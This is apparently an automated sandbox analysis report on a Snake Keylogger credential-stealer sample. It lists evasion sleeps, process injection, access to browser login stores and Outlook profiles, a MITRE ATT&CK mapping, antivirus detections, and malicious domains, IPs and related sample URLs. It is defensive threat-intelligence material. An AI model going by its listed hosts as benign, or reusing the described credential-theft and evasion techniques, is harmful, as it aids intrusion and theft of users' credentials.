            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 595296
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 595187
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 595076
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 594968
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 594859
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 594749
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 594640
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread delayed: delay time: 594531
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Window / User API: threadDelayed 2042
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Window / User API: threadDelayed 7821
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 3660 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -24903104499507879s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -599889s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 3148 Thread sleep count: 2042 > 30
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -599781s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 3148 Thread sleep count: 7821 > 30
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -599671s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -599562s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -599453s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -599343s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -599232s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -599009s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -598904s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -598796s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -598687s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -598578s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -598468s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -598359s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -598250s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -598140s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -598031s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -597921s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -597812s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -597703s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -597593s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -597484s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -597374s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -597265s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -597156s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -597046s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -596937s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -596828s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -596718s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -596609s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -596499s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -596390s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -596281s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -596171s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -596062s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -595953s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -595843s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -595734s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -595625s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -595515s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -595405s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -595296s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -595187s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -595076s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -594968s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -594859s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -594749s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -594640s >= -30000s
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe TID: 6480 Thread sleep time: -594531s >= -30000s
            Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498268759.0000000001358000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Memory written: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe base: 140000000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Thread register set: target process: 4304
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Process created: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Queries volume information: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe VolumeInformation
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Queries volume information: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe VolumeInformation
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match, File source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.4498824475.0000000003DAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.4498824475.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.4498824475.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 3688, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 4304, type: MEMORYSTR
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara match, File source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 3688, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 4304, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match, File source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.4498824475.0000000003DAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.4498824475.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.4498824475.0000000003A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 3688, type: MEMORYSTR
            Source: Yara match, File source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 4304, type: MEMORYSTR
            MITRE ATT&CK Matrix

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 211 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Email Collection | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 211 Process Injection | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Software Packing | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | 13 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            SourceDetectionScannerLabelLink
            rp8s2rxD5lpuQAG.exe55%ReversingLabsWin64.Spyware.Snakekeylogger
            rp8s2rxD5lpuQAG.exe100%AviraTR/AD.SnakeStealer.qhsrm
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
https://reallyfreegeoip.org | 0% | URL Reputation | safe
http://checkip.dyndns.org | 0% | URL Reputation | safe
http://checkip.dyndns.org/ | 0% | URL Reputation | safe
http://checkip.dyndns.com | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://checkip.dyndns.org/q | 0% | URL Reputation | safe
http://reallyfreegeoip.org | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
azvconsulting.com | 185.14.58.143 | true | true | (none) | unknown
reallyfreegeoip.org | 188.114.97.3 | true | true | (none) | unknown
checkip.dyndns.com | 193.122.130.0 | true | false | (none) | unknown
checkip.dyndns.org | unknown | unknown | true | (none) | unknown
Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/173.254.250.90 | false | (none) | unknown
Name | Source (process, memory dump) | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org | rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C19000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C2D000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C62000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B9C000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C06000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C75000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.org | rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://azvconsulting.com | rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003DAF000.00000004.00000800.00020000.00000000.sdmp | false | (none) | unknown
http://checkip.dyndns.com | rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C19000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C2D000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C62000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C06000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C75000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003A41000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/173.254.250.90p | rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp | false | (none) | unknown
http://checkip.dyndns.org/q | rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://reallyfreegeoip.org | rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/ | rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp; rp8s2rxD5lpuQAG.exe, 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
185.14.58.143 | azvconsulting.com | Spain | 202054 | S4N-ASES | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1540254
Start date and time: 2024-10-23 16:00:40 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rp8s2rxD5lpuQAG.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@4/3
EGA Information: Failed
HCA Information:
• Successful, ratio: 67%
• Number of executed functions: 109
• Number of non-executed functions: 1
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target rp8s2rxD5lpuQAG.exe, PID 3688 because it is empty
• Execution Graph export aborted for target rp8s2rxD5lpuQAG.exe, PID 4304 because it is empty
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: rp8s2rxD5lpuQAG.exe
Time | Type | Description
10:01:31 | API Interceptor | 14348735x Sleep call for process: rp8s2rxD5lpuQAG.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
188.114.97.3 | http://onlinecheapflights.net/ | malicious | Unknown | onlinecheapflights.net/
188.114.97.3 | Technical Datasheet and Specification_PDF.exe | malicious | Unknown | www.rihanaroly.sbs/othk/?0dk=RykyQ3QZ+r1dqZwhAQupYMuQy26h2PYi8Fyfl3RAfHSVFgYOfXbCDUNV+aNHe22U393WzLygMMdANTa+vksg1hx1LENxGTGsZa2bATkiGgfiS6KvHA==&urk=NXuT
188.114.97.3 | request-BPp -RFQ 0975432.exe | malicious | PureLog Stealer | www.ergeneescortg.xyz/guou/
188.114.97.3 | Halkbank_Ekstre_20230426_075819_154055.exe | malicious | FormBook | www.thetahostthe.top/9r5x/
188.114.97.3 | http://comodozeropoint.com/updates/1736162964/N1/Team.exe | malicious | Unknown | comodozeropoint.com/updates/1736162964/N1/Team.exe
188.114.97.3 | SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exe | malicious | Unknown | servicetelemetryserver.shop/api/index.php
188.114.97.3 | SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe | malicious | Unknown | servicetelemetryserver.shop/api/index.php
188.114.97.3 | SecuriteInfo.com.Trojan.DownLoader47.45523.5497.16574.exe | malicious | Unknown | servicetelemetryserver.shop/api/index.php
188.114.97.3 | ZP4KZDHVHWZZ2DC13DMX.exe | malicious | Amadey | tipinfodownload-soft1.com/g9jvjfd73/index.php
188.114.97.3 | aQdB62N7SB.elf | malicious | Shikitega, Xmrig | main.dsn.ovh/dns/loadbit
193.122.130.0 | InvoiceXCopy.xls | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | Pedido urgente_pdf.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | CLOSURE.doc | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | greatthingswithgreatideasgivenmerestthignstgood.hta | malicious | Cobalt Strike, Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | NEW ORDER QUOTATION REQUEST.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | z40sun.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
193.122.130.0 | z55PleasefindattachedtheRFQinquiry.exe | malicious | Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | Rundholterne89.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
193.122.130.0 | Swift Detail 103.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | 001_215_EA2047939_202410210815.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | InvoiceXCopy.xls | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | eFo07GvEf0.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | Pedido urgente_pdf.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | Ziraat Bankasi Swift Mesaji,pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | AmountXpayable.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
reallyfreegeoip.org | FINAL SHIPPING DOCS.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | CLOSURE.doc | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | REVISED INVOICE.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | Inquiry N_ TM23-10-00.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
reallyfreegeoip.org | 41570002689_20220814_05352297_HesapOzeti.exe | malicious | MassLogger RAT | 188.114.97.3
checkip.dyndns.com | InvoiceXCopy.xls | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | eFo07GvEf0.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
checkip.dyndns.com | Pedido urgente_pdf.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | Ziraat Bankasi Swift Mesaji,pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | AmountXpayable.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | FINAL SHIPPING DOCS.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 132.226.8.169
checkip.dyndns.com | CLOSURE.doc | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
